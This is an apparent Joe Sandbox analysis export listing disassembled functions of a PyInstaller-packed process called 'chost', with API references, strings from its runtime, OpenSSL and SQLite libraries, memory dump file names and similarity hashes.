GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF694361B6A), ref: 00007FF69436295E

Strings

Error [ANSI Fallback], xrefs: 00007FF6943629FF
[PYI-%d:ERROR] , xrefs: 00007FF694362966
%s: %s, xrefs: 00007FF6943629E8
Error, xrefs: 00007FF694362A0E

Memory Dump Source

Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd

Similarity

API ID: CurrentProcess
String ID: %s: %s$Error$Error [ANSI Fallback]$[PYI-%d:ERROR]
API String ID: 2050909247-2962405886
Opcode ID: 9e805cce3db004805378da731f60641a61a9f8723a57293993104ba7ce00817f
Instruction ID: 0140eb5a2f4093fad854a4630648e13eb0062c883a5c13996e8e5e456cd7bad8
Opcode Fuzzy Hash: 9e805cce3db004805378da731f60641a61a9f8723a57293993104ba7ce00817f
Instruction Fuzzy Hash: 3231C962B1968292E7309773A8815EA7295FF887D4F408139FE8DC3755EF7CD546C600

Function 00007FF694362390 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF6943623C8
DialogBoxIndirectParamW.USER32 ref: 00007FF69436248E
DeleteObject.GDI32 ref: 00007FF6943624C1
DestroyIcon.USER32 ref: 00007FF6943624D3

Strings

Unhandled exception in script, xrefs: 00007FF6943623F8

Memory Dump Source

Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd

Similarity

API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
String ID: Unhandled exception in script
API String ID: 3081866767-2699770090
Opcode ID: 9d37adb8919aaa9301242e1672c0db5e18d6b44b4274937772719b263de12092
Instruction ID: 5d38c67b2b2d211b82ec4a952f5596d4b307ef1577acbea10c63d916ea519da5
Opcode Fuzzy Hash: 9d37adb8919aaa9301242e1672c0db5e18d6b44b4274937772719b263de12092
Instruction Fuzzy Hash: 38315F7261968289EB30EB32E8952F97360FF89784F544179EA4D87B5ADF3CD104C700

Function 00007FF694362B50 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 65windowCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,00000000,00000000,FFFFFFFF,00000000,00007FF69436918F,?,00007FF694363C55), ref: 00007FF694362BA0
MessageBoxW.USER32 ref: 00007FF694362C2A

Strings

[PYI-%d:%ls] , xrefs: 00007FF694362BA8
Warning, xrefs: 00007FF694362C1D
WARNING, xrefs: 00007FF694362BAF

Memory Dump Source

Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd

Similarity

API ID: CurrentMessageProcess
String ID: WARNING$Warning$[PYI-%d:%ls]
API String ID: 1672936522-3797743490
Opcode ID: 9e6d9589c2ecbe46adae8e106eadd318faf54c8367477cb0129d25f7ec3a12f1
Instruction ID: 1ed238c28ff3441aacd5d3e953c375920b0b8e908db4c8850ad09c56c7be8d23
Opcode Fuzzy Hash: 9e6d9589c2ecbe46adae8e106eadd318faf54c8367477cb0129d25f7ec3a12f1
Instruction Fuzzy Hash: 5121A372708B4292E7209B26F8857AA73A4EB88780F40813AEA8DD7756DE3CD605C700

Function 00007FF694362710 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 64COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,00000000,00000000,?,00000000,00007FF694361B99), ref: 00007FF694362760

Strings

Error [ANSI Fallback], xrefs: 00007FF6943627CF
[PYI-%d:%s] , xrefs: 00007FF694362768
ERROR, xrefs: 00007FF69436276F
Error, xrefs: 00007FF6943627DE

Memory Dump Source

Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd

Similarity

API ID: CurrentProcess
String ID: ERROR$Error$Error [ANSI Fallback]$[PYI-%d:%s]
API String ID: 2050909247-1591803126
Opcode ID: 16defea7d45dc340f891dcb1518e5bd63c50e449678e4b46de0281de23a8290b
Instruction ID: acb090b7fed5302f8a1616eebe57da262de0da86608b3f2e97c5dc219c5d32fa
Opcode Fuzzy Hash: 16defea7d45dc340f891dcb1518e5bd63c50e449678e4b46de0281de23a8290b
Instruction Fuzzy Hash: 86217172A1978292E630DB62B8817EAB394EB88384F408179FA8CC3759DF7CD549C740

Function 00007FF694379AF8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 00007FF694379B1D
GetProcAddress.KERNEL32 ref: 00007FF694379B33
FreeLibrary.KERNEL32 ref: 00007FF694379B5A

Strings

CorExitProcess, xrefs: 00007FF694379B2C
mscoree.dll, xrefs: 00007FF694379B14

Memory Dump Source

Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 644f40749f2397ccfee8900b191f86882f652c7814ccefc594fcc00cef1e1075
Instruction ID: 0d05e3bfdaf80de667f5b7547d690a6faa0e73dcae0319fba1f68cf6e2594ce4
Opcode Fuzzy Hash: 644f40749f2397ccfee8900b191f86882f652c7814ccefc594fcc00cef1e1075
Instruction Fuzzy Hash: 05F0AF31A09A07C1FA248B32A4C53799320EF85761F5482BDD66EC62E4DF2CD044C300

Function 00007FF6943893D8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00007FF694389400
_set_statfp.LIBCMT ref: 00007FF69438941B
_set_statfp.LIBCMT ref: 00007FF694389437
_set_statfp.LIBCMT ref: 00007FF694389473

Memory Dump Source

Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
Instruction ID: cf1cf84fd7519ef8d569f3edcb94ba82d80560a5becd3dfce82a468c10d313cf
Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
Instruction Fuzzy Hash: FC11BF62E0CA1301FA769176D8D6375A044EF98360E24C6BCEB6FC73D6AE2CA941C100

Function 00007FF69437B400 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

FlsGetValue.KERNEL32(?,?,?,00007FF69437A613,?,?,00000000,00007FF69437A8AE,?,?,?,?,?,00007FF69437A83A), ref: 00007FF69437B41F
FlsSetValue.KERNEL32(?,?,?,00007FF69437A613,?,?,00000000,00007FF69437A8AE,?,?,?,?,?,00007FF69437A83A), ref: 00007FF69437B43E
FlsSetValue.KERNEL32(?,?,?,00007FF69437A613,?,?,00000000,00007FF69437A8AE,?,?,?,?,?,00007FF69437A83A), ref: 00007FF69437B466
FlsSetValue.KERNEL32(?,?,?,00007FF69437A613,?,?,00000000,00007FF69437A8AE,?,?,?,?,?,00007FF69437A83A), ref: 00007FF69437B477
FlsSetValue.KERNEL32(?,?,?,00007FF69437A613,?,?,00000000,00007FF69437A8AE,?,?,?,?,?,00007FF69437A83A), ref: 00007FF69437B488

Memory Dump Source

Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 43a5c13e669b9c0dc60c9d5204f3187f9cebb30c335aac4df6ce1d0b58ad24f5
Instruction ID: c3816e7ccb4b4bd9dcc8aac9f5bf226c5acc07ae850c02c62bca5ca817c8b057
Opcode Fuzzy Hash: 43a5c13e669b9c0dc60c9d5204f3187f9cebb30c335aac4df6ce1d0b58ad24f5
Instruction Fuzzy Hash: EE113D31A0C642C1FA78A7779AD21796161DF447B4F64C3BCEABDD67D6DE2CA441C200

Function 00007FF69437B294 Relevance: 7.6, APIs: 5, Instructions: 50COMMON

Download Yara Rule

APIs

FlsGetValue.KERNEL32 ref: 00007FF69437B2A5
FlsSetValue.KERNEL32 ref: 00007FF69437B2C4
FlsSetValue.KERNEL32 ref: 00007FF69437B2EC
FlsSetValue.KERNEL32 ref: 00007FF69437B2FD
FlsSetValue.KERNEL32 ref: 00007FF69437B30E

Memory Dump Source

Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 8aa69c65082f5ed190463b1c2d732539134b8ecb86da000f77e4666776fecf75
Instruction ID: 19b0fa22ed921aca760f9be08ab730e1ca0926be049320a6483ac4a7e6d976ec
Opcode Fuzzy Hash: 8aa69c65082f5ed190463b1c2d732539134b8ecb86da000f77e4666776fecf75
Instruction Fuzzy Hash: E3110630A0D207C5FA78627348D227E1191DF45324F58C7BCDABEDA2C2DD2DB481C241

Function 00007FF694376010 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 242COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF69437604C
_invalid_parameter_noinfo.LIBCMT ref: 00007FF694376176
_invalid_parameter_noinfo.LIBCMT ref: 00007FF69437622C

Strings

verbose, xrefs: 00007FF694376020

Memory Dump Source

Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: verbose
API String ID: 3215553584-579935070
Opcode ID: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
Instruction ID: 42273c6188cbe88440b9ca7e3ba895a8a964c810ab7160691afe433292c5d24c
Opcode Fuzzy Hash: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
Instruction Fuzzy Hash: 9E918B32A0CA46C5E7B59E36D4A437D36A1EB44BA4F44C17ADADAC62D6DF3CE805C301

Function 00007FFDF70E86F0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 239COMMON

Download Yara Rule

APIs

00007FFE0E142010.VCRUNTIME140(?,?,?,?,00000080,?,?,?,00000000,00007FFDF70E8BBF), ref: 00007FFDF70E8889
00007FFE0E142010.VCRUNTIME140(?,?,?,?,00000080,?,?,?,00000000,00007FFDF70E8BBF), ref: 00007FFDF70E890B
00007FFE0E142010.VCRUNTIME140(?,?,?,?,00000080,?,?,?,00000000,00007FFDF70E8BBF), ref: 00007FFDF70E89FD

Strings

RETURNING may not use "TABLE.*" wildcards, xrefs: 00007FFDF70E8771

Memory Dump Source

Source File: 00000011.00000002.2382752356.00007FFDF7051000.00000040.00000001.01000000.00000016.sdmp, Offset: 00007FFDF7050000, based on PE: true

Associated: 00000011.00000002.2382708573.00007FFDF7050000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 00000011.00000002.2382752356.00007FFDF71B2000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000011.00000002.2382752356.00007FFDF71B4000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000011.00000002.2382752356.00007FFDF71C9000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000011.00000002.2383046562.00007FFDF71CB000.00000080.00000001.01000000.00000016.sdmpDownload File
Associated: 00000011.00000002.2383085811.00007FFDF71CC000.00000004.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffdf7050000_chost.jbxd

Similarity

API ID: 00007E142010
String ID: RETURNING may not use "TABLE.*" wildcards
API String ID: 2636501453-2313493979
Opcode ID: ccacce6d775528294b1bb77d916a8275d8b67c98ba807ef499f0322dea0ce11d
Instruction ID: 5500e2788fff8a8f80c868cc33dd1663cb2614367c08d34bcfb140c4f0dacc23
Opcode Fuzzy Hash: ccacce6d775528294b1bb77d916a8275d8b67c98ba807ef499f0322dea0ce11d
Instruction Fuzzy Hash: 12B1BC26B08A8185E720CB15D550AE967A1EB85BE4F09A335DEBD477D9DF38E0A1C300

Function 00007FF69437FC38 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF69437FF17

Part of subcall function 00007FF694377AAC: _invalid_parameter_noinfo.LIBCMT ref: 00007FF694377AC9

Strings

ccs, xrefs: 00007FF69437FE52
UTF-16LEUNICODE, xrefs: 00007FF69437FEB5
UTF-8, xrefs: 00007FF69437FE96

Memory Dump Source

Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: UTF-16LEUNICODE$UTF-8$ccs
API String ID: 3215553584-1196891531
Opcode ID: 4ea7f6e1ba59c177a711b7ec70ee344f27d005a52efb2894dd87f7f788f8515e
Instruction ID: c110ae03df0e133b930d4504e237ea070e2f33ccaea4a1adbe7c69e3ef5f2956
Opcode Fuzzy Hash: 4ea7f6e1ba59c177a711b7ec70ee344f27d005a52efb2894dd87f7f788f8515e
Instruction Fuzzy Hash: 46816B72E0C243C6FA744E3B81902792AA0FB11B48F65C0BDDA89D76DADF2DA901D741

Function 00007FFDEAE41FB0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 173COMMON

Download Yara Rule

APIs

00007FFE1FFB6570.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDEAE41FE8
00007FFE1FFB6570.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDEAE42006

Strings

CJK UNIFIED IDEOGRAPH-, xrefs: 00007FFDEAE41FFC
HANGUL SYLLABLE , xrefs: 00007FFDEAE41FD5

Memory Dump Source

Source File: 00000011.00000002.2378252189.00007FFDEAE41000.00000040.00000001.01000000.00000022.sdmp, Offset: 00007FFDEAE40000, based on PE: true

Associated: 00000011.00000002.2378210021.00007FFDEAE40000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 00000011.00000002.2378252189.00007FFDEAEA2000.00000040.00000001.01000000.00000022.sdmpDownload File
Associated: 00000011.00000002.2378252189.00007FFDEAEEE000.00000040.00000001.01000000.00000022.sdmpDownload File
Associated: 00000011.00000002.2378252189.00007FFDEAEF2000.00000040.00000001.01000000.00000022.sdmpDownload File
Associated: 00000011.00000002.2378252189.00007FFDEAEF7000.00000040.00000001.01000000.00000022.sdmpDownload File
Associated: 00000011.00000002.2378252189.00007FFDEAF4F000.00000040.00000001.01000000.00000022.sdmpDownload File
Associated: 00000011.00000002.2378252189.00007FFDEAF54000.00000040.00000001.01000000.00000022.sdmpDownload File
Associated: 00000011.00000002.2378252189.00007FFDEAF57000.00000040.00000001.01000000.00000022.sdmpDownload File
Associated: 00000011.00000002.2378628612.00007FFDEAF58000.00000080.00000001.01000000.00000022.sdmpDownload File
Associated: 00000011.00000002.2378672916.00007FFDEAF59000.00000004.00000001.01000000.00000022.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffdeae40000_chost.jbxd

Similarity

API ID: 00007B6570
String ID: CJK UNIFIED IDEOGRAPH-$HANGUL SYLLABLE
API String ID: 4069847057-87138338
Opcode ID: 8c364d9f7697f15a55bc755bfe662b8d9c35c3fd34f27cade82d87210dead623
Instruction ID: 5d199ab1c57ac5e4d6d5aedfd0b7c4d1c60945b5e69885636dc53fb45c236bc0
Opcode Fuzzy Hash: 8c364d9f7697f15a55bc755bfe662b8d9c35c3fd34f27cade82d87210dead623
Instruction Fuzzy Hash: 38610932B1864346E66CAA15A43077E769AFB84F90F458275EADD47BC8EF3ED801C701

Function 00007FFDF6A42469 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 172COMMON

Download Yara Rule

APIs

00007FFE0E140EF0.VCRUNTIME140 ref: 00007FFDF6A9D776

Strings

tls_parse_ctos_server_name, xrefs: 00007FFDF6A9D729, 00007FFDF6A9D785, 00007FFDF6A9D7F6, 00007FFDF6A9D823, 00007FFDF6A9D868
D:\a\1\s\include\internal/packet.h, xrefs: 00007FFDF6A9D7AE, 00007FFDF6A9D7CF
..\s\ssl\statem\extensions_srvr.c, xrefs: 00007FFDF6A9D735, 00007FFDF6A9D79A, 00007FFDF6A9D802, 00007FFDF6A9D82F, 00007FFDF6A9D874

Memory Dump Source

Source File: 00000011.00000002.2378751077.00007FFDF6A41000.00000040.00000001.01000000.0000001B.sdmp, Offset: 00007FFDF6A40000, based on PE: true

Associated: 00000011.00000002.2378710820.00007FFDF6A40000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6AC3000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6AC5000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6AED000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6AF8000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6B03000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2379034636.00007FFDF6B07000.00000080.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2379155081.00007FFDF6B09000.00000004.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffdf6a40000_chost.jbxd

Similarity

API ID: 00007E140
String ID: ..\s\ssl\statem\extensions_srvr.c$D:\a\1\s\include\internal/packet.h$tls_parse_ctos_server_name
API String ID: 3866994075-4157686371
Opcode ID: df7c5cc1c5450ab236299e71f02084b029a770e3f54b11b68fceadd1af193070
Instruction ID: ae1b010212c6247c4ca41eb53528f3e1f053dc8c749552a025a6a33f6ee4d387
Opcode Fuzzy Hash: df7c5cc1c5450ab236299e71f02084b029a770e3f54b11b68fceadd1af193070
Instruction Fuzzy Hash: 12611461F0CA9241FB20AB21D420FB9B399EF45B88F585231DA7D47EDEDE2CE5818700

Function 00007FFDF6A6F070 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 172COMMON

Download Yara Rule

APIs

00007FFE1FFB08A0.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FFDF6A6F127

Strings

SSL_SESSION_new, xrefs: 00007FFDF6A6F0D0, 00007FFDF6A6F18E
ssl_get_new_session, xrefs: 00007FFDF6A6F1D2, 00007FFDF6A6F30A
..\s\ssl\ssl_sess.c, xrefs: 00007FFDF6A6F0B2, 00007FFDF6A6F0DC, 00007FFDF6A6F19A, 00007FFDF6A6F1BE, 00007FFDF6A6F1DE, 00007FFDF6A6F316

Memory Dump Source

Source File: 00000011.00000002.2378751077.00007FFDF6A41000.00000040.00000001.01000000.0000001B.sdmp, Offset: 00007FFDF6A40000, based on PE: true

Associated: 00000011.00000002.2378710820.00007FFDF6A40000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6AC3000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6AC5000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6AED000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6AF8000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6B03000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2379034636.00007FFDF6B07000.00000080.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2379155081.00007FFDF6B09000.00000004.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffdf6a40000_chost.jbxd

Similarity

API ID: 00007
String ID: ..\s\ssl\ssl_sess.c$SSL_SESSION_new$ssl_get_new_session
API String ID: 3568877910-2527649602
Opcode ID: 81de3dcb5b9a74f6d10349495346cbec55276295be6eb05afdb2b4af8c059850
Instruction ID: 1eb2b8970f37df6813fdf783ea684342edd40d9c3ab0ca9d7943d198dcbdf390
Opcode Fuzzy Hash: 81de3dcb5b9a74f6d10349495346cbec55276295be6eb05afdb2b4af8c059850
Instruction Fuzzy Hash: 87719961B08AC282EB48AB35D960BBD7299FB84B84F544135DA3D4BBDEDF3DA5418700

Function 00007FF69436D6B8 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF69436D6E3
_IsNonwritableInCurrentImage.LIBCMT ref: 00007FF69436D77A
RtlUnwindEx.KERNEL32 ref: 00007FF69436D7D4

Strings

csm, xrefs: 00007FF69436D761

Memory Dump Source

Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm
API String ID: 2395640692-1018135373
Opcode ID: c7f5fdff7c0b40b6635b3f9850cf21a5be83d788788a684f503aa9329af71794
Instruction ID: f33db39e2dfaab69e9516923f1277f205e740758d65645103020de53731904ff
Opcode Fuzzy Hash: c7f5fdff7c0b40b6635b3f9850cf21a5be83d788788a684f503aa9329af71794
Instruction Fuzzy Hash: 8851B232B296438AEB64CF26E489A387791FB44B98F14C178DA4E87748DF7CE841C700

Function 00007FFDF708C607 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 149COMMON

Download Yara Rule

APIs

00007FFE0E142010.VCRUNTIME140 ref: 00007FFDF708C74D
00007FFE0E142010.VCRUNTIME140 ref: 00007FFDF708C766

Strings

out of memory, xrefs: 00007FFDF7092498
string or blob too big, xrefs: 00007FFDF7092123

Memory Dump Source

Source File: 00000011.00000002.2382752356.00007FFDF7051000.00000040.00000001.01000000.00000016.sdmp, Offset: 00007FFDF7050000, based on PE: true

Associated: 00000011.00000002.2382708573.00007FFDF7050000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 00000011.00000002.2382752356.00007FFDF71B2000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000011.00000002.2382752356.00007FFDF71B4000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000011.00000002.2382752356.00007FFDF71C9000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000011.00000002.2383046562.00007FFDF71CB000.00000080.00000001.01000000.00000016.sdmpDownload File
